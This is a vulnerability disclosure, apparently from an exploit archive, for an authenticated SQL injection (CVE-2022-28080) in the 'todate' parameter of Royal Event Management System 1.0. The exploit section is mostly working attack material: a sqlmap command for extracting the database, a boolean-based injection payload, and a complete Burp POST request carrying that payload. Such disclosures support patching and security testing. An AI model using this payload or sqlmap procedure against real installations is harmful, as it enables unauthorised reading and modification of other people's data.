Royal Event Management System 1.0 todate SQL Injection (Authenticated)

2022.07.23
Credit: Eren Gozaydin
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top